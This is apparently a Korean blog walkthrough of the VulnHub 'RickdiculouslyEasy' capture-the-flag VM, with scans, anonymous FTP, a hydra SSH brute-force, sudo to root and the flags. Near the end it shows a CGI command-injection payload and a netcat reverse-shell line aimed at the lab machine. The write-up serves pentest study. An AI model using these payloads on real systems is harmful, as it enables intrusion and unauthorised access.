INFO
Name : RickdiculouslyEasy
Entry : 16 / 35
Level:
VulnHub URL : https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/
GOAL
As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.
SETUP
I’m using both VMWare Workstation and Virtual box(depending on conditions of the image) to host Kali and the MisDirection image, with both VMs running in a NAT network(sometimes Bridged). I used VirtualBox this time.
DESCRIPTION
This is a fedora server vm, created with virtualbox.
It is a very simple Rick and Morty themed boot to root.
There are 130 points worth of flags available (each flag has its points recorded with it), you should also get root.
It's designed to be a beginner ctf, if you're new to pen testing, check it out!
TABLE OF CONTENTS
1. DISCOVERY
2. SCANNING
3. WEB ENUMRATION & EXPLOITATION
4. PRIVILEGE ESCALATION
5. EXTRA POINTS
1. DISCOVERY
: netdiscover
2. SCANNING
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh?
80/tcp open http Apache httpd 2.4.27 ((Fedora))
| http-methods:
|_ Potentially risky methods: TRACE
9090/tcp open http Cockpit web service 161 or earlier
┌──(root💀takudaddy)-[~]
└─# nmap -p- 192.168.10.34 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-01 18:34 KST
Nmap scan report for 192.168.10.34
Host is up (0.000082s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
9090/tcp open zeus-admin
13337/tcp open unknown
22222/tcp open easyengine
60000/tcp open unknown
: TRACE METHODS
FTP
┌──(root💀takudaddy)-[~]
└─# ftp 192.168.10.34
Connected to 192.168.10.34.
220 (vsFTPd 3.0.3)
Name (192.168.10.34:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 42 Aug 22 2017 FLAG.txt
drwxr-xr-x 2 0 0 6 Feb 12 2017 pub
226 Directory send OK.
ftp> get FLAG.txt
local: FLAG.txt remote: FLAG.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for FLAG.txt (42 bytes).
226 Transfer complete.
42 bytes received in 0.00 secs (42.8138 kB/s)
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> pwd
257 "/pub" is the current directory
ftp> cd ..
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 42 Aug 22 2017 FLAG.txt
drwxr-xr-x 2 0 0 6 Feb 12 2017 pub
226 Directory send OK.
ftp> bye
221 Goodbye.
┌──(root💀takudaddy)-[~]
└─# cat FLAG.txt
FLAG{Whoa this is unexpected} - 10 Points
: flag 10/130
3. WEB ENUMERATION & EXPLOITATION
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /passwords/: Directory indexing found.
+ OSVDB-3092: /passwords/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
==> DIRECTORY: http://192.168.10.34/passwords/
+ http://192.168.10.34/index.html (CODE:200|SIZE:326)
+ http://192.168.10.34/robots.txt (CODE:200|SIZE:126)
/.htaccess (Status: 403) [Size: 218]
/.htpasswd (Status: 403) [Size: 218]
/cgi-bin/ (Status: 403) [Size: 217]
/passwords (Status: 301) [Size: 239] [--> http://192.168.10.34/passwords/]
/robots.txt (Status: 200) [Size: 126]
: 80
: 9090
: flag 20/130
/passwords
/FLAG.txt
: flag 30/130
/passwords.html
┌──(root💀takudaddy)-[~]
└─# curl -v http://192.168.10.34/passwords/passwords.html
* Trying 192.168.10.34:80...
* Connected to 192.168.10.34 (192.168.10.34) port 80 (#0)
> GET /passwords/passwords.html HTTP/1.1
> Host: 192.168.10.34
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Thu, 01 Apr 2021 10:45:40 GMT
< Server: Apache/2.4.27 (Fedora)
< Last-Modified: Wed, 23 Aug 2017 09:51:24 GMT
< ETag: "160-55768a7a87d2a"
< Accept-Ranges: bytes
< Content-Length: 352
< Content-Type: text/html; charset=UTF-8
<
<!DOCTYPE html>
<html>
<head>
<title>Morty's Website</title>
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body>
<!--Password: winter-->
</head>
</html>
* Connection #0 to host 192.168.10.34 left intact
password : winter
/robots.txt
/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
shellshock? LFI?
된다!
cat 명령어는 안 먹네;;
그렇다면 more로 대체~
RickSanchez / Morty / Summer 유저가 있다.
Summer 암호가 winter 인가 설마?
맞다 ;;
ftp나 ssh로 붙어보자.
┌──(root💀takudaddy)-[~]
└─# ftp 192.168.10.34 255 ⨯
Connected to 192.168.10.34.
220 (vsFTPd 3.0.3)
Name (192.168.10.34:root): Summer
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 1002 1002 48 Aug 21 2017 FLAG.txt
226 Directory send OK.
ftp> get FLAG.txt
local: FLAG.txt remote: FLAG.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for FLAG.txt (48 bytes).
226 Transfer complete.
48 bytes received in 0.00 secs (41.6297 kB/s)
ftp> bye
221 Goodbye.
┌──(root💀takudaddy)-[~]
└─# ls
Desktop Downloads Music Public Videos
Documents FLAG.txt Pictures Templates
┌──(root💀takudaddy)-[~]
└─# cat FLAG.txt
FLAG{Get off the high road Summer!} - 10 Points
flag 40/130
* 참고로 ssh로 붙을 경우엔 21번 포트로 붙을 수 없다.
위에서 찾은 포트 22222번 내용을 보면
이렇게 되어 있기에 ssh로 접속 시엔
해당 포트를 사용해야 접속이 가능하다.
┌──(root💀takudaddy)-[~]
└─# ssh Summer@192.168.10.34 -p 22222 255 ⨯
The authenticity of host '[192.168.10.34]:22222 ([192.168.10.34]:22222)' can't be established.
ECDSA key fingerprint is SHA256:rP4CX/V9xNZay9srIUBRq2BFQTnmxUO9cs1F3E9yzg0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.10.34]:22222' (ECDSA) to the list of known hosts.
Summer@192.168.10.34's password:
Last login: Thu Apr 1 22:33:00 2021
[Summer@localhost ~]$ exit
logout
Connection to 192.168.10.34 closed.
암튼 계속 가보자.
[Summer@localhost ~]$ cd /home
[Summer@localhost home]$ ls
Morty RickSanchez Summer
[Summer@localhost home]$ cd Morty
[Summer@localhost Morty]$ ls -al
total 64
drwxr-xr-x. 2 Morty Morty 131 Sep 15 2017 .
drwxr-xr-x. 5 root root 52 Aug 18 2017 ..
-rw-------. 1 Morty Morty 1 Sep 15 2017 .bash_history
-rw-r--r--. 1 Morty Morty 18 May 30 2017 .bash_logout
-rw-r--r--. 1 Morty Morty 193 May 30 2017 .bash_profile
-rw-r--r--. 1 Morty Morty 231 May 30 2017 .bashrc
-rw-r--r--. 1 root root 414 Aug 22 2017 journal.txt.zip
-rw-r--r--. 1 root root 43145 Aug 22 2017 Safe_Password.jpg
[Summer@localhost Morty]$ cp journal.txt.zip ~
[Summer@localhost Morty]$ cp Safe_Password.jpg ~
[Summer@localhost home]$ cd RickSanchez/
[Summer@localhost RickSanchez]$ ls
RICKS_SAFE ThisDoesntContainAnyFlags
[Summer@localhost RickSanchez]$ cd RICKS_SAFE/
[Summer@localhost RICKS_SAFE]$ ls -al
total 12
drwxr-xr-x. 2 RickSanchez RickSanchez 18 Sep 21 2017 .
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 2017 ..
-rwxr--r--. 1 RickSanchez RickSanchez 8704 Sep 21 2017 safe
[Summer@localhost RICKS_SAFE]$ cp safe ~
[Summer@localhost RICKS_SAFE]$ cd ..
[Summer@localhost RickSanchez]$ cd ThisDoesntContainAnyFlags/
[Summer@localhost ThisDoesntContainAnyFlags]$ ls -al
total 4
drwxrwxr-x. 2 RickSanchez RickSanchez 26 Aug 18 2017 .
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 2017 ..
-rw-rw-r--. 1 RickSanchez RickSanchez 95 Aug 18 2017 NotAFlag.txt
[Summer@localhost ThisDoesntContainAnyFlags]$ cp NotAFlag.txt ~
[Summer@localhost ThisDoesntContainAnyFlags]$ cd /home
힌트 파일들을 찾았다.
해당 유저 폴더로 복사해
우리 쪽으로 가져와 본다.
[Summer@localhost Morty]$ python -m SimpleHTTPServer 7979
Serving HTTP on 0.0.0.0 port 7979 ...
┌──(root💀takudaddy)-[/study]
└─# wget http://192.168.10.34:7979/Safe_Password.jpg
--2021-04-01 20:57:20-- http://192.168.10.34:7979/Safe_Password.jpg
Connecting to 192.168.10.34:7979... connected.
HTTP request sent, awaiting response... 200 OK
Length: 43145 (42K) [image/jpeg]
Saving to: ‘Safe_Password.jpg’
Safe_Password.j 100%[=======>] 42.13K --.-KB/s in 0s
2021-04-01 20:57:20 (948 MB/s) - ‘Safe_Password.jpg’ saved [43145/43145]
* 참고 *
파이썬으로 포트를 생성하기 귀찮으면
scp 명령어로 가지고 오는 방법도 있다.
나머지 파일은 위 방법으로 가져오자
┌──(root💀takudaddy)-[/study]
└─# scp -P 22222 Summer@192.168.10.34:safe .
Summer@192.168.10.34's password:
safe 100% 8704 3.7MB/s 00:00
┌──(root💀takudaddy)-[/study]
└─# scp -P 22222 Summer@192.168.10.34:NotAFlag.txt .
Summer@192.168.10.34's password:
NotAFlag.txt 100% 95 40.4KB/s 00:00
파일을 확인한다.
┌──(root💀takudaddy)-[/study]
└─# unzip journal.txt.zip
Archive: journal.txt.zip
[journal.txt.zip] journal.txt password:
password incorrect--reenter:
압축을 풀려고 했더니 암호를 입력하라 함.
winter 넣어봤지만 실패.
아무래도 다른 파일이 힌트일 듯.
확인해보자.
┌──(root💀takudaddy)-[/study]
└─# strings Safe_Password.jpg
JFIF
Exif
8 The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek
8BIM
8BIM
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
#3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
0D000D\DDDD\t\\\\\t
password : Meeseek
다시 열어보자
┌──(root💀takudaddy)-[/study]
└─# unzip journal.txt.zip
Archive: journal.txt.zip
[journal.txt.zip] journal.txt password:
inflating: journal.txt
┌──(root💀takudaddy)-[/study]
└─# ls
45939.py hydra.restore journal.txt journal.txt.zip Safe_Password.jpg
┌──(root💀takudaddy)-[/study]
└─# cat journal.txt
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?
Anyway. Here it is:
FLAG: {131333} - 20 Points
flag 60/130
131333은 password 같다.
나머지 파일들 확인
┌──(root💀takudaddy)-[/study]
└─# cat NotAFlag.txt
hhHHAaaaAAGgGAh. You totally fell for it... Classiiiigihhic.
But seriously this isn't a flag..
┌──(root💀takudaddy)-[/study]
└─# strings safe
/lib64/ld-linux-x86-64.so.2
.hK}m
libmcrypt.so.4
__gmon_start__
__libc_start_main
GLIBC_2.2.5
%z
AWAVI
AUATL
[]A\A]A^A_
rijndael-128
%d,
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
AAAAAAAAAAAAAAAA
decrypt: %304s
g py?
;*3$"
GCC: (GNU) 7.1.1 20170622 (Red Hat 7.1.1-3)
.text
.fini
.rodata
.eh_frame_hdr
.eh
.got.plt
.data
.bss
.comment
safe 파일은 실행이 안 된다.
Summer 유저로 실행할 수 있는
것으로 보이는데 해보니
[Summer@localhost ~]$ ./safe
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
맞다.
argument를 사용하라는데 비번 넣으라는 건가?
[Summer@localhost ~]$ ./safe 131333
decrypt: FLAG{And Awwwaaaaayyyy we Go!} - 20 Points
Ricks password hints:
(This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order
1 uppercase character
1 digit
One of the words in my old bands name.� @
일단 flag 80/130
다음 힌트는 Rick의 밴드 이름이란다.
내가 어찌 암 -_-;;
구글링 해보면
Flech Curtains
이걸 대문자 하나랑 숫자 하나로 변환해야 한단다..
우선 해당 단어들을 경우의 수대로 만들어주고
┌──(root💀takudaddy)-[/study]
└─# crunch 7 7 -t ,%Flesh -o flesh.pass 1 ⨯
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
crunch: 100% completed generating output
┌──(root💀takudaddy)-[/study]
└─# ls
45939.py hydra.restore journal.txt.zip safe
flesh.pass journal.txt NotAFlag.txt Safe_Password.jpg
┌──(root💀takudaddy)-[/study]
└─# wc -l flesh.pass
260 flesh.pass
┌──(root💀takudaddy)-[/study]
└─# crunch 10 10 -t ,%Curtains -o curtains.pass
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
crunch: 100% completed generating output
두 리스트를 하나로 합친 후
hydra로 brute force password attack.
┌──(root💀takudaddy)-[/study]
└─# cat flesh.pass curtains.pass > pass.list
┌──(root💀takudaddy)-[/study]
└─# hydra -l RickSanchez -P pass.list ssh://192.168.10.34 -s 22222
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-01 21:34:41
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 520 login tries (l:1/p:520), ~33 tries per task
[DATA] attacking ssh://192.168.10.34:22222/
[STATUS] 180.00 tries/min, 180 tries in 00:01h, 344 to do in 00:02h, 16 active
[STATUS] 130.00 tries/min, 260 tries in 00:02h, 264 to do in 00:03h, 16 active
[STATUS] 135.33 tries/min, 406 tries in 00:03h, 119 to do in 00:01h, 16 active
[22222][ssh] host: 192.168.10.34 login: RickSanchez password: P7Curtains
찾았다.
P7Curtains
사용자 전환한다.
[Summer@localhost home]$ su RickSanchez
Password:
[RickSanchez@localhost home]$ id
uid=1000(RickSanchez) gid=1000(RickSanchez) groups=1000(RickSanchez),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[RickSanchez@localhost home]$
4. PRIVILEGE ESCALATION
[RickSanchez@localhost ~]$ sudo -l
[sudo] password for RickSanchez:
Matching Defaults entries for RickSanchez on localhost:
!visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User RickSanchez may run the following commands on localhost:
(ALL) ALL
[RickSanchez@localhost ~]$ sudo /bin/bash
[root@localhost RickSanchez]#
[root@localhost RickSanchez]# cd /root
[root@localhost ~]# ls
anaconda-ks.cfg FLAG.txt
[root@localhost ~]# cat FLAG.txt
_
| \
| |
| |
|\ | |
/, ~\ / /
X `-.....-------./ /
~-. ~ ~ |
\ / |
\ /_ ___\ /
| /\ ~~~~~ \ |
| | \ || |
| |\ \ || )
(_/ (_/ ((_/
[root@localhost ~]#
sudo 명령어로 뭐든 할 수 있어서
바로 루트 전환에 성공.
하지만 플래그 출력이 고양이다.
cat 말고 more을 써야 한다.
[root@localhost ~]# more FLAG.txt
FLAG: {Ionic Defibrillator} - 30 points
[root@localhost ~]#
flag 110/130
이렇게 끝인데
아직 못 뒤져본 곳이 있어서
포인트도 모을 겸 뒤져본다.
5. EXTRA POINTS
혹 nc 있는지 확인 후 리스너 기동,
붙을 수 있는지 실험.
안 붙는다;
동일 작업을 curl로 수행해보자
┌──(root💀takudaddy)-[~]
└─# curl 192.168.10.34/cgi-bin/tracertool.cgi?ip=192.168.10.34;id
<html><head><title>Super Cool Webpage
</title></head>
<b>MORTY'S MACHINE TRACER MACHINE</b>
<br>Enter an IP address to trace.</br>
<form action=/cgi-bin/tracertool.cgi
method="GET">
<textarea name="ip" cols=40 rows=4>
</textarea>
<input type="submit" value="Trace!">
</form>
<pre>
traceroute to 192.168.10.34 (192.168.10.34), 30 hops max, 60 byte packets
1 localhost.localdomain (192.168.10.34) 0.010 ms 0.003 ms 0.002 ms
</pre>
</html>
uid=0(root) gid=0(root) groups=0(root),142(kaboxer)
┌──(root💀takudaddy)-[~]
└─# curl 192.168.10.34/cgi-bin/tracertool.cgi?ip=192.168.10.34;nc -e /bin/bash 192.168.10.10 7979
<html><head><title>Super Cool Webpage
</title></head>
<b>MORTY'S MACHINE TRACER MACHINE</b>
<br>Enter an IP address to trace.</br>
<form action=/cgi-bin/tracertool.cgi
method="GET">
<textarea name="ip" cols=40 rows=4>
</textarea>
<input type="submit" value="Trace!">
</form>
<pre>
traceroute to 192.168.10.34 (192.168.10.34), 30 hops max, 60 byte packets
1 localhost.localdomain (192.168.10.34) 0.010 ms 0.002 ms 0.002 ms
</pre>
</html>
되는 듯했지만
내 서버로 붙게 된다.
루트까지 얻은 마당에
의미없는 작업이기에
걍 넘어간다.
: 13337
nc로 붙으면,
┌──(root💀takudaddy)-[/study]
└─# nc 192.168.10.34 13337 1 ⨯
FLAG:{TheyFoundMyBackDoorMorty}-10Points
: flag 120/130
: 60000
쉘이다.
nc로 붙어보면 또
뭔가 할 수 있지 않을까?
┌──(root💀takudaddy)-[~]
└─# nc 192.168.10.34 60000 1 ⨯
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt
# cat FLAG.txt
FLAG{Flip the pickle Morty!} - 10 Points
# cd /home
Permission Denied.
# ls -al
FLAG.txt
# cd ..
Permission Denied.
: flag 130/130
끝
728x90
'OSCP > Vulnahub' 카테고리의 다른 글
| 18. Breach 1 (0) | 2021.04.05 |
|---|---|
| 17. Tommy boy (0) | 2021.04.03 |
| 15. DerpNStink (0) | 2021.04.01 |
| 14. EVM (0) | 2021.04.01 |
| 13. djinn (1) | 2021.04.01 |